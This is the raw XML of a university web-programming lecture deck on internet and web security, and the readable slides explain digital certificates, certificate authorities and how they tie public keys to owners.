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 id="2147484219" r:id="rId2"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId44"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId45"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="317" r:id="rId3"/>
    <p:sldId id="318" r:id="rId4"/>
    <p:sldId id="716" r:id="rId5"/>
    <p:sldId id="715" r:id="rId6"/>
    <p:sldId id="748" r:id="rId7"/>
    <p:sldId id="749" r:id="rId8"/>
    <p:sldId id="750" r:id="rId9"/>
    <p:sldId id="751"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66" r:id="rId25"/>
    <p:sldId id="767" r:id="rId26"/>
    <p:sldId id="612" r:id="rId27"/>
    <p:sldId id="768" r:id="rId28"/>
    <p:sldId id="769" r:id="rId29"/>
    <p:sldId id="770" r:id="rId30"/>
    <p:sldId id="771" r:id="rId31"/>
    <p:sldId id="772" r:id="rId32"/>
    <p:sldId id="773" r:id="rId33"/>
    <p:sldId id="774" r:id="rId34"/>
    <p:sldId id="775" r:id="rId35"/>
    <p:sldId id="776" r:id="rId36"/>
    <p:sldId id="777" r:id="rId37"/>
    <p:sldId id="778" r:id="rId38"/>
    <p:sldId id="779" r:id="rId39"/>
    <p:sldId id="780" r:id="rId40"/>
    <p:sldId id="781" r:id="rId41"/>
    <p:sldId id="782" r:id="rId42"/>
    <p:sldId id="74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on Ja Yeom" initials="SJY" lastIdx="1" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="936995bc-9852-42b9-ada8-8da03cffe5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0E4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75"/>
    <p:restoredTop sz="71863" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="97" d="100"/>
          <a:sy n="97" d="100"/>
        </p:scale>
        <p:origin x="944" y="19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8D283C-DE37-6F4C-BF0F-BED1216340AF}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/23/18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01257F-F465-014D-9568-D0F86ECBD9BA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2764560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36E82-B77E-8E40-B1FA-A4F22FFDEC61}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/23/18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06D52-AE12-B74E-B5E1-3ED9C62B5C63}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16852354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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="109692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11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="266086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12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="103649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13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="349910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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="310567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15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="334140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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="235539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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="318550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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3315397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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11595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20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="187206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US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5E0DFE19-785B-A345-845C-D8AFE79C09BD}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="415251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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="181353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22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3340493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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1186021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24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2116218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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="251901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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3268387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27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2197173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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1368558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29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="298442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30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="94170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06D52-AE12-B74E-B5E1-3ED9C62B5C63}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2262594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31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2740607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32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="729026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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1024276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34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3142415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latin typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mn-l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35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="346285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36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="732378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37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="701770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38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3905038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39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3527407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40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="216312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5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2572168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D06D52-AE12-B74E-B5E1-3ED9C62B5C63}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="130227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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="272492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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="263792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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="283267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9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="233416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292611D1-50F3-CD4F-99F5-935B2875DEB6}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="233340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3277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6807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77462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070103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530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32738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60474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07859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860350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2098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5E1116F-C16B-A047-81DE-E2658897E2B0}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/23/18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97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183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76337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889748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927601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927394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149834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127654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9556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912316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001792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3758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5/23/18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4068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5374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1116F-C16B-A047-81DE-E2658897E2B0}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/23/18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850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5/23/18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95146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1116F-C16B-A047-81DE-E2658897E2B0}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/23/18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2270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3082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5/23/18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8222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1948548723"/>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5E1116F-C16B-A047-81DE-E2658897E2B0}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/23/18</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3959204315"/>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uSw0IoSr3Hk"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SJJmoDZ3il8"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Web Programming</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Lecture 8 internet/web security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5FD889E0-CAB2-4699-909D-B9A88D47ACBE}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7099FFB5-F743-6546-A81D-A6AE898C99AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5261995" y="5721350"/>
            <a:ext cx="3207929" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Soonja.Yeom@utas.edu.au</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A15A792C-C2D0-6545-9223-C6BBE15E53E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5234743" y="5454134"/>
            <a:ext cx="3262432" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Amanda.Lunt@utas.edu.au</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="413592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How do I find out the public key?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566057" y="2281102"/>
            <a:ext cx="8158843" cy="3985228"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2200" dirty="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2200" b="1" dirty="0"/>
              <a:t>certificate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2200" dirty="0"/>
              <a:t> is an electronic document that identifies someone or something</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0"/>
              <a:t>similar to a driver's licence, a fishing licence, or a student ID card</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0"/>
              <a:t>certificates verify something about the owner</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" dirty="0"/>
              <a:t>a student ID verifies that the owner is a student</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-AU" sz="1600" dirty="0"/>
              <a:t>a drivers licence verifies that the owner is permitted drive a vehicle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2200" dirty="0"/>
              <a:t>certificates are used to associate the owner with a public key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2000" dirty="0"/>
              <a:t>thus, they help prevent impersonation through the use of fake public keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71A4FD51-E877-A142-AB39-2FBB05634648}"/>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10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="361268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FFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Certificates</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="174173" y="2318592"/>
            <a:ext cx="8885390" cy="4539408"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="2200" dirty="0"/>
              <a:t>electronic certificates are issues by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2200" b="1" dirty="0"/>
              <a:t>certificate authorities (CAs)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>just as student ID's are issued by universities, and driving licences are issued by the transport department</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>the CA verifies the identity of the owner before issuing the certificate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Certificate authority (CA): well-known, trusted server that certifies public keys.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Service computes its keys, gives public key to certificate authority (along with proof of identity)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Certificate authority returns certificate for that server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server can pass along this certificate to browsers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browsers accept certificates from dozens of authorities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B662BA5-FDDD-0340-BE53-D2A89531B14F}"/>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11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="324348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FFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Certificate Content</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
